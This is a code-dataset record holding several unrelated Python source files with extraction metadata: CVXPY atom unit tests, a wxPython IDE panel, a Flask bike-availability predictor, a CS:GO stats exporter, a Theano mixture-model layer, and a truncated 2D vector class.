p3 = Problem(Minimize(x+g), [x >= 5])
p3.solve()
self.assertAlmostEqual(p1.value, p3.value)
def test_partial_optimize_numeric_fn(self) -> None:
x, y = Variable(), Variable()
xval = 4
# Solve the (simple) two-stage problem by "combining" the two stages
# (i.e., by solving a single linear program)
p1 = Problem(Minimize(y), [xval+y >= 3])
p1.solve()
# Solve the two-stage problem via partial_optimize
constr = [y >= -100]
p2 = Problem(Minimize(y), [x+y >= 3] + constr)
g = partial_optimize(p2, [y], [x])
x.value = xval
y.value = 42
constr[0].dual_variables[0].value = 42
result = g.value
self.assertAlmostEqual(result, p1.value)
self.assertAlmostEqual(y.value, 42)
self.assertAlmostEqual(constr[0].dual_value, 42)
# No variables optimized over.
p2 = Problem(Minimize(y), [x+y >= 3])
g = partial_optimize(p2, [], [x, y])
x.value = xval
y.value = 42
p2.constraints[0].dual_variables[0].value = 42
result = g.value
self.assertAlmostEqual(result, y.value)
self.assertAlmostEqual(y.value, 42)
self.assertAlmostEqual(p2.constraints[0].dual_value, 42)
def test_partial_optimize_stacked(self) -> None:
"""Minimize the 1-norm in the usual way
"""
dims = 3
x = Variable(dims, name='x')
t = Variable(dims, name='t')
p1 = Problem(Minimize(cp.sum(t)), [-t <= x, x <= t])
# Minimize the 1-norm via partial_optimize
g = partial_optimize(p1, [t], [x])
g2 = partial_optimize(Problem(Minimize(g)), [x])
p2 = Problem(Minimize(g2))
p2.solve()
p1.solve()
self.assertAlmostEqual(p1.value, p2.value)
def test_nonnegative_variable(self) -> None:
"""Test the NonNegative Variable class.
"""
x = Variable(nonneg=True)
p = Problem(Minimize(5+x), [x >= 3])
p.solve()
self.assertAlmostEqual(p.value, 8)
self.assertAlmostEqual(x.value, 3)
def test_mixed_norm(self) -> None:
"""Test mixed norm.
"""
y = Variable((5, 5))
obj = Minimize(cp.mixed_norm(y, "inf", 1))
prob = Problem(obj, [y == np.ones((5, 5))])
result = prob.solve()
self.assertAlmostEqual(result, 5)
def test_mat_norms(self) -> None:
"""Test that norm1 and normInf match definition for matrices.
"""
A = np.array([[1, 2], [3, 4]])
print(A)
X = Variable((2, 2))
obj = Minimize(cp.norm(X, 1))
prob = cp.Problem(obj, [X == A])
result = prob.solve()
print(result)
self.assertAlmostEqual(result, cp.norm(A, 1).value, places=3)
obj = Minimize(cp.norm(X, np.inf))
prob = cp.Problem(obj, [X == A])
result = prob.solve()
print(result)
self.assertAlmostEqual(result, cp.norm(A, np.inf).value, places=3)
def test_indicator(self) -> None:
x = cp.Variable()
constraints = [0 <= x, x <= 1]
expr = cp.transforms.indicator(constraints)
x.value = .5
self.assertEqual(expr.value, 0.0)
x.value = 2
self.assertEqual(expr.value, np.inf)
def test_log_det(self) -> None:
# test malformed input
with self.assertRaises(ValueError) as cm:
cp.log_det([[1, 2], [3, 4]]).value
self.assertEqual(str(cm.exception),
"Input matrix was not Hermitian/symmetric.")
def test_lambda_max(self) -> None:
with self.assertRaises(ValueError) as cm:
cp.lambda_max([[1, 2], [3, 4]]).value
self.assertEqual(str(cm.exception),
"Input matrix was not Hermitian/symmetric.")
def test_diff(self) -> None:
"""Test the diff atom.
"""
A = cp.Variable((20, 10))
B = np.zeros((20, 10))
self.assertEqual(cp.diff(A, axis=0).shape,
np.diff(B, axis=0).shape)
self.assertEqual(cp.diff(A, axis=1).shape,
np.diff(B, axis=1).shape)
def test_log_normcdf(self) -> None:
self.assertEqual(cp.log_normcdf(self.x).sign, s.NONPOS)
self.assertEqual(cp.log_normcdf(self.x).curvature, s.CONCAVE)
for x in range(-4, 5):
self.assertAlmostEqual(
np.log(scipy.stats.norm.cdf(x)),
cp.log_normcdf(x).value,
places=None,
delta=1e-2,
)
y = Variable((2, 2))
obj = Minimize(cp.sum(-cp.log_normcdf(y)))
prob = Problem(obj, [y == 2])
result = prob.solve()
self.assertAlmostEqual(
-result, 4 * np.log(scipy.stats.norm.cdf(2)), places=None, delta=1e-2
)
|
en
| 0.76404
|
Copyright 2013 <NAME> Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Unit tests for the atoms module. Test the copy function for AddExpresion class. # A new object is constructed, so copy.args == atom.args but copy.args # is not atom.args. # Test copy with new args Test the norm_inf class. # self.assertEqual(atom.name(), "norm_inf(x + y)") Test the norm1 class. # self.assertEqual(atom.name(), "norm1(x + y)") Test that list input is rejected. Test quad_form atom. Test the power class. # Test copy with args=None # A new object is constructed, so copy.args == atom.args but copy.args # is not atom.args. # Test copy with new args # Test the geo_mean class. # Test copy with args=None # A new object is constructed, so copy.args == atom.args but copy.args # is not atom.args. # Test copy with new args # Test the harmonic_mean class. # Test the pnorm class. # Test copy with args=None # A new object is constructed, so copy.args == atom.args but copy.args # is not atom.args. # Test copy with new args Matrix 1-norm, 2-norm (sigma_max), infinity-norm, Frobenius norm, and nuclear-norm. # Test quad_over_lin DCP. # Test quad_over_lin shape validation. Test arg count for max and min variants. Test for the matrix_frac atom. # Test matrix_frac shape validation. Test max. # One arg, test sign. # Test with axis argument. # Invalid axis. Test min. # One arg, test sign. # Test with axis argument. # Invalid axis. # Test sign logic for maximum. # Two args. # Many args. # Promotion. # Test sign logic for minimum. # Two args. 
# Many args. # Promotion. Test the sum atom. # Mixed curvature. # Test with axis argument. # Invalid axis. Test the multiply atom. # Test promotion. # Test the vstack class. # self.assertEqual(atom[1,0].name(), "vstack(x[0,0], x[1,0])[1,0]") Test the reshape class. # Test C-style reshape. # Test more complex C-style reshape: matrix to another matrix Test the vec atom. Test the diag atom. # Test that diag is PSD Test the trace atom. Test the log1p atom. # Valid. # M parameter. # Valid. # Invalid. # Test copy with args=None # A new object is constructed, so copy.args == atom.args but copy.args # is not atom.args. # As get_data() returns a Constant, we have to check the value # Test copy with new args Test the sum_largest atom and related atoms. # Test copy with args=None # A new object is constructed, so copy.args == atom.args but copy.args # is not atom.args. # Test copy with new args # Test copy with lambda_sum_largest, which is in fact an AddExpression Test the sum_smallest atom and related atoms. Test the copy function for index. # Test copy with args=None # A new object is constructed, so copy.args == atom.args but copy.args # is not atom.args. # Test copy with new args Test the bmat atom. Test the conv atom. Test the kron atom. Test DCP properties of partial optimize. # Evaluate the 1-norm in the usual way (i.e., in epigraph form). Test the partial_optimize atom. # Evaluate the 1-norm in the usual way (i.e., in epigraph form). # Minimize the 1-norm via partial_optimize. # Minimize the 1-norm using maximize. # Try leaving out args. # Minimize the 1-norm via partial_optimize. # Minimize the 1-norm via partial_optimize. 
# Minimize the 1-norm in the usual way # Minimize the 1-norm via partial_optimize # Solve the (simple) two-stage problem by "combining" the two stages # (i.e., by solving a single linear program) # Solve the two-stage problem via partial_optimize # Solve the (simple) two-stage problem by "combining" the two stages # (i.e., by solving a single linear program) # Solve the two-stage problem via partial_optimize # Solve the (simple) two-stage problem by "combining" the two stages # (i.e., by solving a single linear program) # Solve the two-stage problem via partial_optimize Test partial optimize with parameters. # Solve the (simple) two-stage problem by "combining" the two stages # (i.e., by solving a single linear program) # Solve the two-stage problem via partial_optimize # Solve the (simple) two-stage problem by "combining" the two stages # (i.e., by solving a single linear program) # Solve the two-stage problem via partial_optimize # No variables optimized over. Minimize the 1-norm in the usual way # Minimize the 1-norm via partial_optimize Test the NonNegative Variable class. Test mixed norm. Test that norm1 and normInf match definition for matrices. # test malformed input Test the diff atom.
| 1.899299
| 2
|
tools/IDE/src/output_tools.py
|
zxpower/MansOS
| 10
|
6628527
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2008-2012 the MansOS team. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import wx
class OutputTools(wx.Notebook):
def __init__(self, parent, API):
#wx.Notebook.__init__(self, parent)
self.API = API
#self.SetBackgroundColour("White")
def addTools(self):
self.API.infoArea.Reparent(self.API.frame)
self.API.frame.auiManager.AddPane(self.API.infoArea, self.API.frame.bottomPane)
self.API.listenModule.Reparent(self.API.frame)
self.API.frame.auiManager.AddPane(self.API.listenModule, self.API.frame.bottomPane)
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2008-2012 the MansOS team. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import wx
class OutputTools(wx.Notebook):
def __init__(self, parent, API):
#wx.Notebook.__init__(self, parent)
self.API = API
#self.SetBackgroundColour("White")
def addTools(self):
self.API.infoArea.Reparent(self.API.frame)
self.API.frame.auiManager.AddPane(self.API.infoArea, self.API.frame.bottomPane)
self.API.listenModule.Reparent(self.API.frame)
self.API.frame.auiManager.AddPane(self.API.listenModule, self.API.frame.bottomPane)
|
en
| 0.658356
|
# -*- coding: utf-8 -*- # # Copyright (c) 2008-2012 the MansOS team. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # * Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; # OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF # ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # #wx.Notebook.__init__(self, parent) #self.SetBackgroundColour("White")
| 1.319342
| 1
|
flaskapp/app.py
|
anshgandhi/Predicting_Capital_Bikeshare_bike_availability_realtime
| 0
|
6628528
|
from flask import Flask, flash, redirect, render_template, request, session, abort
app = Flask(__name__)
@app.route("/")
def hello():
stat = []
with open('./stations.csv', 'r') as f:
temp = f.readlines()
for i in temp:
stat.append(i.strip().split(","))
return render_template('results.html',hours=list(range(24)),minutes=["{:02d}".format(i) for i in list(range(0,59,5))],stations=stat)
@app.route("/send",methods=['POST'])
def send():
form_vals = ["hour","minute","station"]
_,month,date = request.form["date_time"].split("-")
month=int(month)
date = int(date)
hour = int(request.form["hour"])
minute = int(request.form["minute"])
stat_id = int(request.form["station"])
stat = []
with open('./stations.csv', 'r') as f:
temp = f.readlines()
for i in temp:
stat.append(i.strip().split(","))
for i,j in enumerate(stat):
if(int(j[1])==stat_id):
cap = stat[i][2]
import tensorflow as tf
from tensorflow.python.framework import ops
import pickle
ops.reset_default_graph()
training_epochs = 1000
batch_size = 64
n_input = 6
n_classes = 1
n_hidden_1 = 6
n_hidden_2 = 2
weights = {
'h1': tf.Variable(pickle.load(open("./../weights/h1.p", "rb"))),
'h2': tf.Variable(pickle.load(open("./../weights/h2.p", "rb"))),
'out': tf.Variable(pickle.load(open("./../weights/hout.p", "rb")))
}
biases = {
'b1': tf.Variable(pickle.load(open("./../weights/b1.p", "rb"))),
'b2': tf.Variable(pickle.load(open("./../weights/b2.p", "rb"))),
'out': tf.Variable(pickle.load(open("./../weights/bout.p", "rb")))
}
#keep_prob = tf.placeholder("float")
x = tf.placeholder("float", [None, n_input])
y = tf.placeholder("float", [None, n_classes])
layer_1 = tf.add(tf.matmul(x, weights['h1']), biases['b1'])
layer_1 = tf.nn.sigmoid(layer_1)
layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2'])
layer_2 = tf.nn.sigmoid(layer_2)
out_layer = tf.matmul(layer_2, weights['out']) + biases['out']
cost = tf.reduce_mean(tf.squared_difference(y,out_layer))
optimizer = tf.train.AdamOptimizer(learning_rate=0.0001).minimize(cost)
import numpy as np
X = np.array([month,date,hour,minute,stat_id,cap]).reshape(-1,6)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
pred = sess.run([out_layer], feed_dict={x: X})
pred_1 = pred[0][0][0]
from sklearn.ensemble import RandomForestRegressor
rf = pickle.load(open("./../weights/rf.p", "rb"))
pred_2 = rf.predict(X)[0]
pred = (pred_1+pred_2)/2
return "<br>".join(["Predicted Number of Bikes are: "+"{:.0f}".format(np.round((pred))),"Capacity at Station: "+str(cap)])
station
if __name__ == "__main__":
app.run(host= '0.0.0.0')
|
from flask import Flask, flash, redirect, render_template, request, session, abort
app = Flask(__name__)
@app.route("/")
def hello():
stat = []
with open('./stations.csv', 'r') as f:
temp = f.readlines()
for i in temp:
stat.append(i.strip().split(","))
return render_template('results.html',hours=list(range(24)),minutes=["{:02d}".format(i) for i in list(range(0,59,5))],stations=stat)
@app.route("/send",methods=['POST'])
def send():
form_vals = ["hour","minute","station"]
_,month,date = request.form["date_time"].split("-")
month=int(month)
date = int(date)
hour = int(request.form["hour"])
minute = int(request.form["minute"])
stat_id = int(request.form["station"])
stat = []
with open('./stations.csv', 'r') as f:
temp = f.readlines()
for i in temp:
stat.append(i.strip().split(","))
for i,j in enumerate(stat):
if(int(j[1])==stat_id):
cap = stat[i][2]
import tensorflow as tf
from tensorflow.python.framework import ops
import pickle
ops.reset_default_graph()
training_epochs = 1000
batch_size = 64
n_input = 6
n_classes = 1
n_hidden_1 = 6
n_hidden_2 = 2
weights = {
'h1': tf.Variable(pickle.load(open("./../weights/h1.p", "rb"))),
'h2': tf.Variable(pickle.load(open("./../weights/h2.p", "rb"))),
'out': tf.Variable(pickle.load(open("./../weights/hout.p", "rb")))
}
biases = {
'b1': tf.Variable(pickle.load(open("./../weights/b1.p", "rb"))),
'b2': tf.Variable(pickle.load(open("./../weights/b2.p", "rb"))),
'out': tf.Variable(pickle.load(open("./../weights/bout.p", "rb")))
}
#keep_prob = tf.placeholder("float")
x = tf.placeholder("float", [None, n_input])
y = tf.placeholder("float", [None, n_classes])
layer_1 = tf.add(tf.matmul(x, weights['h1']), biases['b1'])
layer_1 = tf.nn.sigmoid(layer_1)
layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2'])
layer_2 = tf.nn.sigmoid(layer_2)
out_layer = tf.matmul(layer_2, weights['out']) + biases['out']
cost = tf.reduce_mean(tf.squared_difference(y,out_layer))
optimizer = tf.train.AdamOptimizer(learning_rate=0.0001).minimize(cost)
import numpy as np
X = np.array([month,date,hour,minute,stat_id,cap]).reshape(-1,6)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
pred = sess.run([out_layer], feed_dict={x: X})
pred_1 = pred[0][0][0]
from sklearn.ensemble import RandomForestRegressor
rf = pickle.load(open("./../weights/rf.p", "rb"))
pred_2 = rf.predict(X)[0]
pred = (pred_1+pred_2)/2
return "<br>".join(["Predicted Number of Bikes are: "+"{:.0f}".format(np.round((pred))),"Capacity at Station: "+str(cap)])
station
if __name__ == "__main__":
app.run(host= '0.0.0.0')
|
en
| 0.344637
|
#keep_prob = tf.placeholder("float")
| 2.252235
| 2
|
csgoscraper/exportplayerstatstocsv.py
|
sexnine/csgo_matches_scraper
| 0
|
6628529
|
import pickle
from csgodataclasses.csgodataclasses import *
import yaml
import csv
config = None
def load_config():
print("Loading config")
with open("../config.yml", "r") as f:
global config
config = yaml.safe_load(f)
print("Loaded config!")
def write_csv(data, file_name):
with open("../csgodist/" + file_name, "w", encoding="utf8", newline="") as f:
fc = csv.DictWriter(f, fieldnames=data[0].keys())
fc.writeheader()
fc.writerows(data)
def get_my_data(matches):
my_data = []
for match in matches:
found = False
for team in match.teams:
if found:
break
for player in team.players:
print(player)
if found:
break
if player.name == config.get("my_username"):
print("a")
print(vars(player.stats))
my_data.append(vars(player.stats))
found = True
return my_data
def main():
load_config()
with open("../csgodist/comp.pkl", "rb") as f:
competitive_matches = pickle.load(f)
with open("../csgodist/wingman.pkl", "rb") as f:
wingman_matches = pickle.load(f)
with open("../csgodist/scrim.pkl", "rb") as f:
scrimmage_matches = pickle.load(f)
write_csv(get_my_data(competitive_matches), "comp.csv")
write_csv(get_my_data(wingman_matches), "wingman.csv")
write_csv(get_my_data(scrimmage_matches), "scrim.csv")
if __name__ == "__main__":
main()
|
import pickle
from csgodataclasses.csgodataclasses import *
import yaml
import csv
config = None
def load_config():
print("Loading config")
with open("../config.yml", "r") as f:
global config
config = yaml.safe_load(f)
print("Loaded config!")
def write_csv(data, file_name):
with open("../csgodist/" + file_name, "w", encoding="utf8", newline="") as f:
fc = csv.DictWriter(f, fieldnames=data[0].keys())
fc.writeheader()
fc.writerows(data)
def get_my_data(matches):
my_data = []
for match in matches:
found = False
for team in match.teams:
if found:
break
for player in team.players:
print(player)
if found:
break
if player.name == config.get("my_username"):
print("a")
print(vars(player.stats))
my_data.append(vars(player.stats))
found = True
return my_data
def main():
load_config()
with open("../csgodist/comp.pkl", "rb") as f:
competitive_matches = pickle.load(f)
with open("../csgodist/wingman.pkl", "rb") as f:
wingman_matches = pickle.load(f)
with open("../csgodist/scrim.pkl", "rb") as f:
scrimmage_matches = pickle.load(f)
write_csv(get_my_data(competitive_matches), "comp.csv")
write_csv(get_my_data(wingman_matches), "wingman.csv")
write_csv(get_my_data(scrimmage_matches), "scrim.csv")
if __name__ == "__main__":
main()
|
none
| 1
| 2.8621
| 3
|
|
classes/model/layermodels/mixturemodel_usl_theano_scan.py
|
dennisforster/NeSi
| 1
|
6628530
|
# Copyright (C) 2015, <NAME> <<EMAIL>>
#
# LICENSE: THE SOFTWARE IS PROVIDED "AS IS" UNDER THE
# ACADEMIC FREE LICENSE (AFL) v3.0.
#
import theano
import theano.tensor as T
import numpy as np
from _layermodels import LayerModel_Theano_Scan
from utils.decorators import DocInherit
doc_inherit = DocInherit
#------------------------------------------------------------------------------
class MixtureModel(LayerModel_Theano_Scan):
    """Mixture-model layer built on Theano scan.

    Supplies the ``sequences``/``outputs_info``/``non_sequences`` wiring
    expected by the scan-based multilayer driver, plus the symbolic
    per-step learning and test (inference) graphs.
    """
    def __init__(self, nmultilayer, nlayer, input_source):
        # Symbolic variables; their names encode "<multilayer>.<layer>" so
        # the scan driver can match them by name (see input_parameters()).
        self.W_t = T.matrix("W_%d.%d"%(nmultilayer,nlayer), dtype='float32')
        self.s_t = T.matrix("s_%d.%d"%(nmultilayer,nlayer), dtype='float32')
        # The learning rate epsilon is this layer's only free parameter.
        self.parameters_t = [
            T.scalar("epsilon_%d.%d"%(nmultilayer,nlayer), dtype='float32'),]
        self._nmultilayer = nmultilayer
        self._nlayer = nlayer
        self._input_source = input_source
        # _input_source gives for each input variable which is not from
        # this layer the multilayer and the Layer of its source:
        # _input_source[i][0]: MultiLayer of variable i
        # _input_source[i][1]: Layer of variable i
    @doc_inherit
    def sequences(self, mode='train'):
        # This layer consumes no per-step sequences in any mode.
        # NOTE(review): an unknown mode raises UnboundLocalError on return.
        if (mode == 'train'):
            sequences = []
        elif (mode == 'test'):
            sequences = []
        elif (mode == 'likelihood'):
            sequences = []
        return sequences
    @doc_inherit
    def outputs_info(self, mode='train'):
        # Training carries the weights from step to step; testing carries
        # the activations; the likelihood pass carries nothing.
        if (mode == 'train'):
            outputs_info = [self.W_t]
        elif (mode == 'test'):
            outputs_info = [self.s_t]
        elif (mode == 'likelihood'):
            outputs_info = []
        return outputs_info
    @doc_inherit
    def non_sequences(self, mode='train'):
        # During training the learning-rate scalar is the constant input;
        # at test/likelihood time the (fixed) weight matrix is.
        if (mode == 'train'):
            non_sequences = self.parameters_t
        elif (mode == 'test'):
            non_sequences = [self.W_t]
        elif (mode == 'likelihood'):
            non_sequences = [self.W_t]
        return non_sequences
    @doc_inherit
    def input_parameters(self, mode='train'):
        # Names of the arguments of learningstep()/teststep() in call
        # order; the scan driver resolves them against variable names.
        if (mode == 'train'):
            parameters = [
            's_%d.%d[t]'%(self._input_source[0][0], self._input_source[0][1]),
            'L[t]',
            'W_%d.%d[t-1]'%(self._nmultilayer, self._nlayer),
            'epsilon_%d.%d'%(self._nmultilayer, self._nlayer)
            ]
        elif (mode == 'test'):
            parameters = [
            's_%d.%d[t]'%(self._input_source[0][0], self._input_source[0][1]),
            'W_%d.%d'%(self._nmultilayer, self._nlayer)
            ]
        return parameters
    @doc_inherit
    def learningstep(self, Y, L, W, epsilon):
        # One Hebbian-style update: pull W towards the activation-weighted
        # input statistics, with a decay term keeping the rows bounded.
        s = self._activation(Y,L,W)
        s.name = 's_%d.%d[t]'%(self._nmultilayer,self._nlayer)
        W_new = W + epsilon*(T.tensordot(s,Y,axes=[0,0]) -
            T.sum(s,axis=0)[:,np.newaxis]*W)
        W_new.name = 'W_%d.%d[t]'%(self._nmultilayer,self._nlayer)
        return s, W_new
    @doc_inherit
    def teststep(self, Y, W):
        # activation
        s = self._inference(Y,W)
        s.name = 's_%d.%d[t]'%(self._nmultilayer,self._nlayer)
        return s
    @doc_inherit
    def set_weights(self, W):
        self.W = W
    @doc_inherit
    def get_weights(self):
        return self.W
    def _activation(self, Y, L, W):
        """Return the activation for a given input."""
        # Uniform activation 1/C over the C mixture components, independent
        # of the input (no label information is used here).
        s = T.ones((L.shape[0],W.shape[0]), dtype='float32')/T.cast(W.shape[0],'float32')
        return s
    def _inference(self, Y, W):
        """Return the infered class label for a given input"""
        # Column-normalize W (guarding all-zero entries against division
        # by zero) and project the input onto the normalized weights.
        W_normalized = T.switch(T.eq(W,0), 0, W/T.sum(W, axis=0))
        s = T.tensordot(Y, W_normalized, axes=[1,1])
        return s
|
# Copyright (C) 2015, <NAME> <<EMAIL>>
#
# LICENSE: THE SOFTWARE IS PROVIDED "AS IS" UNDER THE
# ACADEMIC FREE LICENSE (AFL) v3.0.
#
import theano
import theano.tensor as T
import numpy as np
from _layermodels import LayerModel_Theano_Scan
from utils.decorators import DocInherit
doc_inherit = DocInherit
#------------------------------------------------------------------------------
class MixtureModel(LayerModel_Theano_Scan):
"""
"""
def __init__(self, nmultilayer, nlayer, input_source):
self.W_t = T.matrix("W_%d.%d"%(nmultilayer,nlayer), dtype='float32')
self.s_t = T.matrix("s_%d.%d"%(nmultilayer,nlayer), dtype='float32')
self.parameters_t = [
T.scalar("epsilon_%d.%d"%(nmultilayer,nlayer), dtype='float32'),]
self._nmultilayer = nmultilayer
self._nlayer = nlayer
self._input_source = input_source
# _input_source gives for each input variable which is not from
# this layer the multilayer and the Layer of its source:
# _input_source[i][0]: MultiLayer of variable i
# _input_source[i][1]: Layer of variable i
@doc_inherit
def sequences(self, mode='train'):
if (mode == 'train'):
sequences = []
elif (mode == 'test'):
sequences = []
elif (mode == 'likelihood'):
sequences = []
return sequences
@doc_inherit
def outputs_info(self, mode='train'):
if (mode == 'train'):
outputs_info = [self.W_t]
elif (mode == 'test'):
outputs_info = [self.s_t]
elif (mode == 'likelihood'):
outputs_info = []
return outputs_info
@doc_inherit
def non_sequences(self, mode='train'):
if (mode == 'train'):
non_sequences = self.parameters_t
elif (mode == 'test'):
non_sequences = [self.W_t]
elif (mode == 'likelihood'):
non_sequences = [self.W_t]
return non_sequences
@doc_inherit
def input_parameters(self, mode='train'):
if (mode == 'train'):
parameters = [
's_%d.%d[t]'%(self._input_source[0][0], self._input_source[0][1]),
'L[t]',
'W_%d.%d[t-1]'%(self._nmultilayer, self._nlayer),
'epsilon_%d.%d'%(self._nmultilayer, self._nlayer)
]
elif (mode == 'test'):
parameters = [
's_%d.%d[t]'%(self._input_source[0][0], self._input_source[0][1]),
'W_%d.%d'%(self._nmultilayer, self._nlayer)
]
return parameters
@doc_inherit
def learningstep(self, Y, L, W, epsilon):
s = self._activation(Y,L,W)
s.name = 's_%d.%d[t]'%(self._nmultilayer,self._nlayer)
W_new = W + epsilon*(T.tensordot(s,Y,axes=[0,0]) -
T.sum(s,axis=0)[:,np.newaxis]*W)
W_new.name = 'W_%d.%d[t]'%(self._nmultilayer,self._nlayer)
return s, W_new
@doc_inherit
def teststep(self, Y, W):
# activation
s = self._inference(Y,W)
s.name = 's_%d.%d[t]'%(self._nmultilayer,self._nlayer)
return s
@doc_inherit
def set_weights(self, W):
self.W = W
@doc_inherit
def get_weights(self):
return self.W
def _activation(self, Y, L, W):
"""Return the activation for a given input."""
s = T.ones((L.shape[0],W.shape[0]), dtype='float32')/T.cast(W.shape[0],'float32')
return s
def _inference(self, Y, W):
"""Return the infered class label for a given input"""
W_normalized = T.switch(T.eq(W,0), 0, W/T.sum(W, axis=0))
s = T.tensordot(Y, W_normalized, axes=[1,1])
return s
|
en
| 0.494298
|
# Copyright (C) 2015, <NAME> <<EMAIL>> # # LICENSE: THE SOFTWARE IS PROVIDED "AS IS" UNDER THE # ACADEMIC FREE LICENSE (AFL) v3.0. # #------------------------------------------------------------------------------ # _input_source gives for each input variable which is not from # this layer the multilayer and the Layer of its source: # _input_source[i][0]: MultiLayer of variable i # _input_source[i][1]: Layer of variable i # activation Return the activation for a given input. Return the infered class label for a given input
| 2.161551
| 2
|
WolfEyes/Utils/Vector.py
|
TBIproject/WolfEye
| 2
|
6628531
|
<reponame>TBIproject/WolfEye<filename>WolfEyes/Utils/Vector.py
# -*- coding: utf-8 -*-
"""Custom weird vector, very useful."""
import numpy
import math
__all__ = [
'Vector',
]
# Plus simple pour gérer les points/vecteurs 2d
class Vector(object):
    """A simple 2D point/vector with arithmetic, polar and rotation helpers.

    NOTE(review): the original class could not run at all -- it subclassed
    ``numpy.array`` (a factory function, not a type), its ``__init__``
    referenced undefined names, and every method returned the undefined
    class ``D2Point`` (an old name of this class).  Those defects are fixed
    here; the Python-2-only hooks (``__div__``, ``__nonzero__``) are kept
    and aliased to their Python-3 equivalents.
    """

    # Coordinates are rounded to this many digits on read to hide
    # floating-point noise.
    ROUND = 14

    def __init__(this, x=0.0, y=0.0):
        """Build a vector from its two coordinates."""
        this.x = x
        this.y = y

    # --- coordinate accessors (stored as floats, read rounded) ---
    @property
    def x(this): return round(this.__X, this.ROUND)

    @property
    def y(this): return round(this.__Y, this.ROUND)

    @x.setter
    def x(this, value):
        r = this.__X = float(value)
        return r

    @y.setter
    def y(this, value):
        r = this.__Y = float(value)
        return r

    # --- representation ---
    def __str__(this):
        return '(%s, %s)[%s]' % (this.x, this.y, abs(this))

    def __repr__(this): return str(this)

    # --- arithmetic (a scalar operand is broadcast to both components) ---
    def __add__(this, p):
        if isinstance(p, Vector): return Vector(this.x + p.x, this.y + p.y)
        else: return Vector(this.x + p, this.y + p)

    def __sub__(this, p):
        if isinstance(p, Vector): return Vector(this.x - p.x, this.y - p.y)
        else: return Vector(this.x - p, this.y - p)

